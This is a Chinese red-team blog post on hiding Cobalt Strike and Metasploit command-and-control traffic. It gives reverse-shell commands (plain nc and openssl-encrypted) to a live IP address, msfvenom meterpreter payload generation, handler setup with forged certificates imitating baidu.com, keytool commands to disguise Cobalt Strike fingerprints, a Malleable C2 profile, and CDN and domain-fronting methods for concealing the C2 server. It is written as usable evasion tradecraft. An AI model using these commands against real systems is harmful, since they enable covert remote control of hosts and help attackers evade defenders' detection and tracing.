【红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN域前置

本文涉及的产品
密钥管理服务KMS,1000个密钥,100个凭据,1个月
简介: 【红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN域前置

背景交代:

在红蓝对抗或日常测试中会出现一种情况,当我们终于让目标机器上线后,

却因为明显的通信特征被安全设备检测到从而失去目标机器的控制权限,

这时就需要对Cobalt Strike或MSF的特征进行隐藏、对其通信流量进行混淆。


常见红蓝对抗中红队面临问题:

1、通讯协议走TCP&UDP协议,直接被防火墙限制出网

2、通讯协议走无加密HTTP协议,直接明文传输成指纹特征

3、通讯协议走HTTPS或DNS加密协议,直接工具证书成指纹特征

4、通讯协议走HTTPS或DNS加密协议,特征指纹等修改后又被朔源拉黑


红队进行权限控制,主机开始限制出网,尝试走常见出网协议http/https,结果流量设备入侵检测检测系统发现异常,尝试修改工具指纹特征加密流量防止检测,结果被定位到控制服务器,再次使用CDN,云函数,第三方上线等进行隐藏保证权限维持。


蓝队发现处置情况:

1.蓝队-朔源后拉黑控制IP

2.蓝队-设备平台指纹告警

3.蓝队-流量分析异常告警


NC-未加密&加密后-流量抓包对比

nc -lvvp 5566
nc -e /bin/bash 47.94.130.42 5566


在我们的攻击端生成自签名证书(加ssl)

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes


在攻击机上监听指定端口,这里我选择4455

openssl s_server -quiet -key key.pem -cert cert.pem -port 4455

在受害机上执行shell反弹命令(注意修改ip和端口)

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 47.94.130.42:4455 > /tmp/s;

这里可以看到,流量进行了加密,只能隐约的看到一些ssl证书信息。

MSF-流量通讯特征修改-证书-openssl

解决HTTPS-SSL通讯证书被特征标示问题

传统msf虽然使用https等加密方式,不过仍然会有特征(head头部固定)

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_http LHOST=47.94.130.42  LPORT=4455 -f exe -o msf.exe

为了方便流量与其他协议作区分,这里我使用http协议;生成后在虚拟机中上线,不过遇到了奇怪的事情就是,我在上线的虚拟机中抓不到http流量的数据包,而在物理机中抓到了(emmm我也不太懂为什么会这样)

196e5e91117f49aa213cd8ef7c442978_0341361b2ca949ed85f52c002e1dfe87.png

这里可以很明显的看到:固定的GET/POST乱码请求,以及固定的Firefox UA头,下方的post乱码数据是我做的命令交互

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=47.94.130.42  LPORT=4455 -f exe -o msf-https.exe


那么如果使用msf生成https协议的后门呢?

采用msf自带的证书进行上线(但是还是会被流量设备、IDS、IPS等设备检测(特征库))

这里可以看到msf自带的证书,这里我们对该证书进行伪装(这里其实流量上没做什么改变,知识对默认证书指纹做了修改)


1.利用openssl生成证书:

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=xiaodi/L=xiaodi/O=Development/CN=www.baidu.com" -keyout www.baidu.com.key -out www.baidu.com.crt && cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem && rm -f www.baidu.com.key www.baidu.com.crt


2.MSF生成绑定证书后门:

2.MSF生成绑定证书后门:

msfvenom -p windows/

3.MSF监听上线:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 5566
set HandlerSSLCert /root/www.baidu.com.pem
set StagerVerifySSLCert true
run


impersonate_ssl模块

此外Metasploit框架还有一个auxiliary/gather/impersonate_ssl模块,可以用来自动从信任源创建一个虚假证书,十分方便:

use auxiliary/gather/impersonate_ssl 
set RHOST www.baidu.com
run


CS-流量通讯特征修改-证书指纹-keytool

-解决HTTP/S通讯证书及流量特征被特征标示问题

JDK Keytool 修改CS特征


1.修改默认端口:

编辑teamserver文件,更改server port默认端口50050

比如说我这里伪装成MongoDB数据库端口,同样连接服务端的时候密码也需要更改为27017

此外CS在运行的时候加载cobalstrike.store证书(默认配置)


2.去除store证书特征:

查看证书指纹:

keytool -list -v -keystore cobaltstrike.store #keytool java jdk自带


这里可以很明显的看到很明显的cobaltstrike特征,于是我们在证书指纹方面对CS进行二次更改

生成自定义证书指纹:

keytool -keystore cobaltstrike1.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias whgojp.top -dname "CN=whgojp e-Szigno Root CA, OU=e-Szigno CA, O=whogjp Ltd., L=Budapest, S=HU, C=HU"

应用证书指纹:

keytool -importkeystore -srckeystore cobaltstrike1.store -destkeystore cobaltstrike1.store -deststoretype pkcs12

3、去除流量通讯特征:

背景:CS原始HTTP监听器心跳数据包

规则资源:

https://github.com/xx0hcd/Malleable-C2-Profiles

https://github.com/FortyNorthSecurity/C2concealer


重新生成后门文件进行上线抓取心跳包

成功修改心跳包特征


DIY Profiles文件

1.创建C2文件:xiaodi.Profiles

2.写入通讯规则: UA头&GET&POST&心跳&证书等

3.测试规则正常:./c2lint whgojp.prifile

4.加载C2规则启动:

./teamserver ip 密码 whgojp.Profiles
https-certificate {
  set CN      "whgojp e-Szigno Root CA";
  set O        "whogjp Ltd.";
  set C        "HU";
  set L        "Budapest";
  set OU      "e-Szigno CA";
  set ST      "HU";
  set validity "365";
}

#设置,修改成你的证书名称和证书密码

code-signer{
  set keystore "whgojp.store";
  set password "123456";
  set alias "whgojp.top";
}

伪造的证书与下方对应

keytool -keystore whgojp.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias whgojp.top -dname "CN=whgojp e-Szigno Root CA, OU=e-Szigno CA, O=whogjp Ltd., L=Budapest, S=HU, C=HU"

隐藏:

域前置、CDN、云函数,网盘第三方上线等

CS-防封锁处置IP地址-C2&CDN隐藏IP

解决HTTPS-SSL通讯被朔源IP封锁问题

配置:

https://mp.weixin.qq.com/s/MghFgegdp3l3tFE3hOvcYw

1、阿里云备案域名&全站加速CDN配置

尝试超级ping一下,配置成功

开了CDN之后,每超级ping一次都是人民币的声音emmm

2、CS创建监听器-HTTPS/Stager/Header


3、生成后门-进程网络状态&威胁情报平台

成功上线运行

使用火绒剑查看网络连接情况

很显然这里并不是我的真实IP 赶快把CDN服务关了,顶不住了


发挥想象:

域前置?转发器换成CDN;

云函数?转发器换成云函数转发;

代理隐藏?转发器换成代理机;

网关隐藏?转发器换成网关;

相关实践学习
Serverless极速搭建Hexo博客
本场景介绍如何使用阿里云函数计算服务命令行工具快速搭建一个Hexo博客。
相关文章
|
2月前
|
算法 安全 网络安全
概念区分:对称加密、非对称加密、公钥、私钥、签名、证书
概念区分:对称加密、非对称加密、公钥、私钥、签名、证书
106 0
|
4月前
|
算法 安全 数据安全/隐私保护
支付系统---微信支付09------数字签名,现在Bob想要给Pink写一封信,信件的内容不需要加密,怎样能够保证信息的完整性,使用信息完整性的主要手段是摘要算法,散列函数,哈希函数,H称为数据指纹
支付系统---微信支付09------数字签名,现在Bob想要给Pink写一封信,信件的内容不需要加密,怎样能够保证信息的完整性,使用信息完整性的主要手段是摘要算法,散列函数,哈希函数,H称为数据指纹
|
4月前
|
数据安全/隐私保护
https【详解】与http的区别,对称加密,非对称加密,证书,解析流程图
https【详解】与http的区别,对称加密,非对称加密,证书,解析流程图
151 0
|
6月前
|
安全 数据管理 测试技术
网络安全与信息安全:防范漏洞、加强加密与提升安全意识深入探索自动化测试框架的设计原则与实践应用化测试解决方案。文章不仅涵盖了框架选择的标准,还详细阐述了如何根据项目需求定制测试流程,以及如何利用持续集成工具实现测试的自动触发和结果反馈。最后,文中还将讨论测试数据管理、测试用例优化及团队协作等关键问题,为读者提供全面的自动化测试框架设计与实施指南。
【5月更文挑战第27天】 在数字化时代,网络安全与信息安全已成为维护国家安全、企业利益和个人隐私的重要环节。本文旨在分享关于网络安全漏洞的识别与防范、加密技术的应用以及提升安全意识的重要性。通过对这些方面的深入探讨,我们希望能为读者提供一些实用的建议和策略,以应对日益严峻的网络安全挑战。 【5月更文挑战第27天】 在软件开发周期中,自动化测试作为保障软件质量的关键步骤,其重要性日益凸显。本文旨在剖析自动化测试框架设计的核心原则,并结合具体案例探讨其在实际应用中的执行策略。通过对比分析不同测试框架的优缺点,我们提出一套高效、可扩展且易于维护的自动
|
6月前
|
安全 网络安全 CDN
阿里云CDN HTTPS 证书配置流程
阿里云CDN HTTPS 证书配置流程
864 1
|
6月前
|
Java 数据库 数据安全/隐私保护
SpringBoot项目使用jasypt加解密的方法加密数据库密码
SpringBoot项目使用jasypt加解密的方法加密数据库密码
113 0
|
6月前
|
安全 测试技术 区块链
加密项目调研的评估框架
加密项目调研的评估框架
|
6月前
|
安全 算法 网络安全
CDN:配置HTTPS证书
CDN:配置HTTPS证书
175 1
|
6月前
|
域名解析 缓存 负载均衡
CDN配置前置条件
CDN配置前置条件
92 1
|
6月前
|
JSON 前端开发 Java
springboot项目实现实体类加密存库,解密返回给前端
springboot项目实现实体类加密存库,解密返回给前端
90 0